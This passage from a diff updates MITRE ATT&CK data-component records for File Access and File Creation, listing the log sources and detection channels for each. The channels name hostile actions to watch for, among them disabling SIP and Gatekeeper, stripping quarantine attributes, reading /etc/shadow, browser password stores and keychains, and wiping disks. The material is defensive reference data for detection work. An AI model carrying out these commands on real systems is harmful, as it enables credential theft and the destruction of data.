+                            "name": "macos:unifiedlog",
+                            "channel": "log messages related to disk enumeration context or Terminal session"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "defaults write com.apple.system.logging or logd manipulation"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process calling security find-certificate, export, or import"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of log show, fs_usage, or cat targeting system.log"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "execution of launchctl load/unload/start commands"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "base64 -d or osascript invoked on staged file"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "diskutil partitionDisk or eraseVolume with partition scheme modifications"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "grep/cat on files matching credential patterns"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "diskutil eraseDisk/zeroDisk or asr restore with destructive flags"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "spctl --master-disable, csrutil disable, or defaults write to disable Gatekeeper"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process: at, job runner"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of dscl . create with IsHidden=1"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "log stream --predicate 'processImagePath contains \"zip\" OR \"base64\"'"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "xattr utility execution with -w or -p flags"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "execution of 'security', 'cat', or 'grep' commands accessing credential storage"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "launchctl load or boot-time plist registration"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "dscl -create"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "kextload execution from Terminal or suspicious paths"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "xattr -d com.apple.quarantine or similar removal commands"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Security framework operations including keychain access, cryptographic operations, and certificate validation"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of chflags hidden or setfile -a V"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process:spawn, process:exec"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "csrutil disable"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "log show --predicate 'process == <utility>'"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of launchctl with setenv or bootout targeting TCC.db or AppleScript under Finder context"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "command execution triggered by emond (e.g., shell, curl, python)"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Set or unset HIST* variables in shell environment"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "defaults read -g AppleLocale or systemsetup -gettimezone"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "launchctl load/unload or plist file modification"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "dscl . -create"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of commands like `ls -l@`, `xattr -l`, or custom tools interacting with resource forks"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of osascript, sh, bash, zsh, installer, open"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application spawns shell, command interpreter, or command-executing child process with arguments during command-execution phase"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application spawns Unix shell process or superuser binary such as sh, su, toybox, toolbox, or shell-like child process with parameters during execution phase"
+                        },
+                        {
+                            "name": "networkdevice:cli",
+                            "channel": "CLI command"
+                        },
+                        {
+                            "name": "networkdevice:cli",
+                            "channel": "Policy Update"
+                        },
+                        {
+                            "name": "networkdevice:cli",
+                            "channel": "ip ssh pubkey-chain"
+                        },
+                        {
+                            "name": "networkdevice:cli",
+                            "channel": "erase flash:, erase startup-config, format disk"
+                        },
+                        {
+                            "name": "networkdevice:cli",
+                            "channel": "CLI command logs"
+                        },
+                        {
+                            "name": "networkdevice:cli",
+                            "channel": "cmd: cmd=show clock detail"
+                        },
+                        {
+                            "name": "networkdevice:cli",
+                            "channel": "Execution of commands to load, copy, or replace system images (e.g., 'copy tftp flash', 'boot system')"
+                        },
+                        {
+                            "name": "networkdevice:cli",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "networkdevice:cli",
+                            "channel": "Execution of commands like 'show running-config', 'copy running-config', or 'export config'"
+                        },
+                        {
+                            "name": "networkdevice:cli",
+                            "channel": "Execution of CLI commands altering crypto parameters (e.g., 'crypto key generate rsa modulus 512')"
+                        },
+                        {
+                            "name": "networkdevice:cli",
+                            "channel": "format flash:, format disk, reformat commands"
+                        },
+                        {
+                            "name": "networkdevice:cli",
+                            "channel": "erase flash:, erase nvram:, format disk"
+                        },
+                        {
+                            "name": "networkdevice:cli",
+                            "channel": "command logs"
+                        },
+                        {
+                            "name": "networkdevice:cli",
+                            "channel": "command logging"
+                        },
+                        {
+                            "name": "networkdevice:cli",
+                            "channel": "Interface commands"
+                        },
+                        {
+                            "name": "networkdevice:cli",
+                            "channel": "Execution of privileged commands such as 'copy tftp flash', 'boot system', or 'debug memory'"
+                        },
+                        {
+                            "name": "networkdevice:cli",
+                            "channel": "Execution of commands disabling crypto hardware acceleration (e.g., 'no crypto engine enable')"
+                        },
+                        {
+                            "name": "networkdevice:cli",
+                            "channel": "shell command"
+                        },
+                        {
+                            "name": "networkdevice:cli",
+                            "channel": "Commands like 'no logging' or equivalents that disable session history"
+                        },
+                        {
+                            "name": "networkdevice:cli",
+                            "channel": "Execution of commands such as 'copy tftp flash', 'boot system <image>', 'reload'"
+                        },
+                        {
+                            "name": "networkdevice:config",
+                            "channel": "PKI export or certificate manipulation commands"
+                        },
+                        {
+                            "name": "networkdevice:config",
+                            "channel": "Configuration changes referencing 'boot system tftp' or modification of startup-config pointing to external TFTP servers"
+                        },
+                        {
+                            "name": "networkdevice:Firewall",
+                            "channel": "Audit trail or CLI/API access indicating commands like no access-list, delete rule-set, clear config"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "Command Audit / Configuration Change"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "eventlog"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "command_exec"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "command-exec: CLI commands containing \"show clock\", \"show clock detail\", \"show timezone\" executed by suspicious user/source"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "cmd='show aaa*' OR 'show running-config | include password|aaa' OR 'show aaa common-criteria policy all'"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "CLI command audit"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "system boot logs"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "exec command='monitor capture'"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "no logging buffered, no aaa new-model, disable firewall"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "interactive shell logging"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "command sequence: erase \u2192 format \u2192 reload"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "CLI Command Logging"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "CLI Command Audit"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "command audit"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "Privilege-level command execution"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "Detected CLI command to export key material"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "reload command issued"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "syslog facility LOCAL7 or trap messages"
+                        },
+                        {
+                            "name": "saas:PRMetadata",
+                            "channel": "Commit message or branch name contains encoded strings or payload indicators"
+                        },
+                        {
+                            "name": "vpxd.log",
+                            "channel": "VM inventory queries and configuration enumeration through vCenter API calls"
+                        },
+                        {
+                            "name": "WinEventLog:Microsoft-Office-Alerts",
+                            "channel": "Unexpected DLL or component loaded at Office startup"
+                        },
+                        {
+                            "name": "WinEventLog:Microsoft-Office-Alerts",
+                            "channel": "Office application warning or alert on macro execution from template"
+                        },
+                        {
+                            "name": "WinEventLog:Microsoft-Office/OutlookAddinMonitor",
+                            "channel": "Outlook loading add-in via unexpected load path or non-default profile context"
+                        },
+                        {
+                            "name": "WinEventLog:PowerShell",
+                            "channel": "Get-ADTrust|GetAllTrustRelationships"
+                        },
+                        {
+                            "name": "WinEventLog:PowerShell",
+                            "channel": "EventCode=4103, 4104, 4105, 4106"
+                        },
+                        {
+                            "name": "WinEventLog:PowerShell",
+                            "channel": "Execution of Microsoft script to enumerate custom forms in Outlook mailbox"
+                        },
+                        {
+                            "name": "WinEventLog:PowerShell",
+                            "channel": "CommandLine=copy-item or robocopy from UNC path"
+                        },
+                        {
+                            "name": "WinEventLog:PowerShell",
+                            "channel": "PowerShell launched from outlook.exe or triggered without user invocation"
+                        },
+                        {
+                            "name": "WinEventLog:PowerShell",
+                            "channel": "Execution of PowerShell script to enumerate or remove malicious Home Page folder config"
+                        },
+                        {
+                            "name": "WinEventLog:PowerShell",
+                            "channel": "Exchange Cmdlets"
+                        },
+                        {
+                            "name": "WinEventLog:PowerShell",
+                            "channel": "CmdletName: Get-Recipient, Get-User"
+                        },
+                        {
+                            "name": "WinEventLog:PowerShell",
+                            "channel": "Execution of 'Get-WmiObject Win32_Product' or similar PowerShell cmdlets"
+                        },
+                        {
+                            "name": "WinEventLog:PowerShell",
+                            "channel": "Execution of PowerShell without -NoProfile flag"
+                        },
+                        {
+                            "name": "WinEventLog:PowerShell",
+                            "channel": "EventCode=4101"
+                        },
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=4103, 4104, 4105, 4106"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "2.1",
+                    "x_mitre_domains": [
+                        "ics-attack",
+                        "mobile-attack",
+                        "enterprise-attack"
+                    ],
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.774000+00:00\", \"old_value\": \"2026-04-24 19:47:16.123000+00:00\"}}}",
+                    "previous_version": "2.1"
+                },
+                {
+                    "type": "x-mitre-data-component",
+                    "id": "x-mitre-data-component--235b7491-2d2b-4617-9a52-3c0783680f71",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-10-20 15:05:19.273000+00:00",
+                    "modified": "2026-05-12 15:12:00.770000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/datacomponents/DC0055",
+                            "external_id": "DC0055"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "File Access",
+                    "description": "To events where a file is opened or accessed, making its contents available to the requester. This includes reading, executing, or interacting with files by authorized or unauthorized entities. Examples include logging file access events (e.g., Windows Event ID 4663), monitoring file reads, and detecting unusual file access patterns. Examples: \n\n- File Read Operations: A user opens a sensitive document (e.g., financial_report.xlsx) on a shared drive.\n- File Execution: A script or executable file is accessed and executed (e.g., malware.exe is run from a temporary directory).\n- Unauthorized File Access: An unauthorized user attempts to access a protected configuration file (e.g., `/etc/passwd` on Linux or `System32` files on Windows).\n- File Access Patterns: Bulk access to multiple files in a short time (e.g., mass access to documents on a file server).\n- File Access via Network: Files on a network share are accessed remotely (e.g., logs of SMB file access).",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_log_sources": [
+                        {
+                            "name": "macOS:unifiedlog",
+                            "channel": "looking for file access to scripts with abnormal encoding patterns"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "READ or COPY operations where path matches external/shared locations of other apps (e.g., /storage/emulated/0/Android/data/<otherpkg>/files/, /storage/emulated/0/Download/<app>/*)"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "KeyChain/AndroidKeyStore read of token alias"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "READ/LIST/STAT of /sdcard|/storage/emulated/0|/Android/media|/Documents with >N distinct paths in TimeWindow"
+                        },
+                        {
+                            "name": "auditd:FILE",
+                            "channel": "/home/*/.mozilla/firefox/*/logins.json OR /home/*/.config/google-chrome/*/Login Data"
+                        },
+                        {
+                            "name": "auditd:FILE",
+                            "channel": "/proc/*/mem read attempt"
+                        },
+                        {
+                            "name": "auditd:FS",
+                            "channel": "read: File access to /proc/modules or /sys/module/"
+                        },
+                        {
+                            "name": "auditd:PATH",
+                            "channel": "Read access to known backup software configuration files (e.g., /etc/rsnapshot.conf, /opt/veeam/config.ini)"
+                        },
+                        {
+                            "name": "auditd:PATH",
+                            "channel": "open: Access to sensitive log files (/var/log/auth.log, /var/log/secure, /var/log/syslog)"
+                        },
+                        {
+                            "name": "auditd:PATH",
+                            "channel": "PATH"
+                        },
+                        {
+                            "name": "auditd:PATH",
+                            "channel": "file read"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open, read, or stat of browser config files"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open: File access attempt on /tmp/krb5cc_* or /tmp/krb5.ccache"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "openat"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open, read"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open, flock, fcntl, unlink"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "read/open of sensitive files"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "Unusual processes accessing or modifying cookie databases"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "PATH records referencing /dev/video*"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open, read: /etc/ssl/, /etc/pki/, ~/.pki/nssdb/"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "Processes reading credential or token cache files"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "read/open of sensitive file directories"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open/read of sensitive config or secret files"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open/read of sensitive directories"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open/read: Access to /proc/self/status with focus on TracerPID field"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open/read access to ~/.bash_history"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open,read"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open/read system calls to ~/.bash_history or /etc/shadow"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "read of /run/secrets or docker volumes by non-entrypoint process"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "Reads of ~/.bash_history, ~/.mozilla, or access to /dev/input"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open/read"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open: Access to named pipes or FIFO in /tmp or /dev/shm by unexpected processes"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open or read to browser cookie storage"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open, read, mount"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "file"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "Access to /var/lib/sss/secrets/secrets.ldb or .secrets.mkey"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open/read of sensitive directories (/etc, /home/*)"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "PATH"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open/read on ~/.local/share/keepassxc/* OR ~/.password-store/*"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "attempts to read /proc/* entries at scale (openat/getdents64/readlink) or access denied for /proc traversal; correlate to app UID"
+                        },
+                        {
+                            "name": "azure:activity",
+                            "channel": "CollectGuestLogs: Unexpected collection of guest logs by Azure VM Agent outside normal maintenance windows"
+                        },
+                        {
+                            "name": "CloudTrail:GetObject",
+                            "channel": "sensitive credential files in buckets or local image storage"
+                        },
+                        {
+                            "name": "desktop:file_manager",
+                            "channel": "nautilus, dolphin, or gvfs logs"
+                        },
+                        {
+                            "name": "ebpf:syscalls",
+                            "channel": "container_file_activity"
+                        },
+                        {
+                            "name": "ebpf:syscalls",
+                            "channel": "open/read on secret mount paths"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "datastore file access"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "read: Access to sensitive log files by non-admin users"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "datastore/log file access"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "vSphere File API Access"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "file copy or datastore upload via HTTPS"
+                        },
+                        {
+                            "name": "esxi:syslog",
+                            "channel": "guest OS outbound transfer logs"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "VMFS access logs"
+                        },
+                        {
+                            "name": "esxis:vmkernel",
+                            "channel": "Datastore Access"
+                        },
+                        {
+                            "name": "File",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "fs:fileevents",
+                            "channel": "File system access events with kFSEventStreamEventFlagItemRemoved, kFSEventStreamEventFlagItemRenamed flags for environmental artifact collection (/System/Library, /usr/sbin, plist files)"
+                        },
+                        {
+                            "name": "fs:fsevents",
+                            "channel": "file system events indicating access to system configuration files and environmental information sources"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "file"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "File Access Monitor"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "Disk Activity Tracing"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "filesystem activity"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "Filesystem Call Monitoring"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "read/write"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "file open for known browser cookie paths"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "file reads/writes from /Volumes/"
+                        },
+                        {
+                            "name": "fs:quarantine",
+                            "channel": "/var/log/quarantine.log"
+                        },
+                        {
+                            "name": "gcp:audit",
+                            "channel": "Write operations to storage"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "READ operations from App Group containers (/var/mobile/Containers/Shared/AppGroup/...) or Files/Photos provider mountpoints, especially when group not owned by bundle"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "readdir/stat/read of /private/var/mobile/Containers/Shared/AppGroup|/Library/Mobile Documents|/On\\\\ My\\\\ iPhone with >N distinct paths in TimeWindow"
+                        },
+                        {
+                            "name": "kubernetes:audit",
+                            "channel": "GET or LIST requests to /var/run/secrets/kubernetes.io/serviceaccount/ followed by access to the Kubernetes API server"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "/proc/*/maps access"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "auth.log or custom tool logs"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "/var/log/syslog"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "kernel messages related to cryptographic operations, module loading, and filesystem access patterns"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "FileAccessed, MailboxAccessed"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Bulk downloads or API extractions from Microsoft-hosted data repositories (e.g., Dynamics 365)"
+                        },
+                        {
+                            "name": "macos:endpointsecurity",
+                            "channel": "ES_EVENT_TYPE_NOTIFY_OPEN: Open of .dylib/.so in user-writable locations"
+                        },
+                        {
+                            "name": "macos:endpointsecurity",
+                            "channel": "open: Process opens AppleCamera/IOUSB device nodes or AVFoundation frameworks"
+                        },
+                        {
+                            "name": "macos:endpointsecurity",
+                            "channel": "open or read syscall to ~/.bash_history"
+                        },
+                        {
+                            "name": "macos:endpointsecurity",
+                            "channel": "es_event_open, es_event_exec"
+                        },
+                        {
+                            "name": "macos:keychain",
+                            "channel": "Access to Keychain DB or system.keychain"
+                        },
+                        {
+                            "name": "macos:keychain",
+                            "channel": "~/Library/Keychains, /Library/Keychains"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "file_events"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Access to ~/Library/*/Safari or Chrome directories by non-browser processes"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "file events"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Kerberos framework calls to API:{uuid} cache outside normal process lineage"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "~/Library/Application Support/Google/Chrome/*/Login Data OR ~/Library/Application Support/Firefox/*/logins.json"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Read access to Time Machine plist files or CCC configurations in ~/Library/Preferences/"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "log stream - file subsystem"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "file read of sensitive directories"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Abnormal process access to Safari or Chrome cookie storage"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "open: Access to /var/log/system.log or related security event logs"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "open/read of *.plist or .env files"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "read of user document directories"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "read access to ~/Library/Keychains/login.keychain-db"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "filesystem and process events"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "read access to ~/Library/Keychains or history files by terminal processes"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "access to /Volumes/SharePoint or network mount"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Access to ~/Library/Safari/Bookmarks.plist or recent files"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "access to keychain database"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "log stream - file provider subsystem"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "read/write of user documents prior to upload"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "open/read access to private key files (id_rsa, *.pem, *.p12)"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "read: File access to /System/Library/Extensions/ or related kernel extension paths"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "*.opvault OR *.ldb OR *.kdbx"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Recent download opened or executed"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application reads multiple local container files, browser-history artifacts, messaging artifacts, or local records in rapid sequence during the collection phase"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application performs burst reads across local system paths, external storage, media directories, cache locations, or local database files within a short interval as the primary collection phase"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application loads executable or library from external or writable directory (e.g., /sdcard/, app cache) prior to execution"
+                        },
+                        {
+                            "name": "WinEventLog:Microsoft-Windows-Windows Defender/Operational",
+                            "channel": "Suspicious file execution on removable media path"
+                        },
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=4663, 4670, 4656"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "3.0",
+                    "x_mitre_domains": [
+                        "ics-attack",
+                        "enterprise-attack",
+                        "mobile-attack"
+                    ],
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.770000+00:00\", \"old_value\": \"2026-04-23 18:39:07.536000+00:00\"}}}",
+                    "previous_version": "3.0"
+                },
+                {
+                    "type": "x-mitre-data-component",
+                    "id": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-10-20 15:05:19.273000+00:00",
+                    "modified": "2026-05-12 15:12:00.770000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/datacomponents/DC0039",
+                            "external_id": "DC0039"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "File Creation",
+                    "description": "A new file is created on a system or network storage. This action often signifies an operation such as saving a document, writing data, or deploying a file. Logging these events helps identify legitimate or potentially malicious file creation activities. Examples include logging file creation events (e.g., Sysmon Event ID 11 or Linux auditd logs). ",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_log_sources": [
+                        {
+                            "name": "File",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "WinEventLog:Sysmon",
+                            "channel": "EventCode=11"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "creat"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "file write"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "CREATE/MODIFY: Modification of app.asar inside .app bundle"
+                        },
+                        {
+                            "name": "auditd:FILE",
+                            "channel": "File creation with name starting with '.'"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Creation or modification of browser extension .plist files"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open or creat syscalls targeting excluded paths"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "file creation in AV exclusion directories"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "file creation/modification"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "file write/create"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "file write"
+                        },
+                        {
+                            "name": "snmp:syslog",
+                            "channel": "firmware write/log event"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open,creat,rename: Writes in $HOME/Downloads, /tmp, ~/.cache with exe/script/archive/office extensions"
+                        },
+                        {
+                            "name": "fs:fsevents",
+                            "channel": "Create in /Users/*/Downloads or /private/var/folders/* with quarantine attribute"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "file events"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "VMFS file creation"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "write/open, FIM audit"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "open/write/exec calls"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Creation of .plist under /Library/Managed Preferences/"
+                        },
+                        {
+                            "name": "fs:fileevents",
+                            "channel": "creat"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "disk activity on /Library/LaunchAgents or LaunchDaemons"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "file_events"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open: Write to ~/.vscode-cli/code_tunnel.json"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "creation of ~/.vscode-cli/code_tunnel.json"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "create/modify dylib files in monitored directories"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "write"
+                        },
+                        {
+                            "name": "linux:Sysmon",
+                            "channel": "New files in /tmp, /var/tmp, $HOME/.cache, executed within TimeWindow after browser HTTP fetch"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "New files written to /var/folders, /tmp, ~/Library/Caches, or ~/Downloads by browser context or its children"
+                        },
+                        {
+                            "name": "auditd:FILE",
+                            "channel": "create: New file created in system binaries or temp directories"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
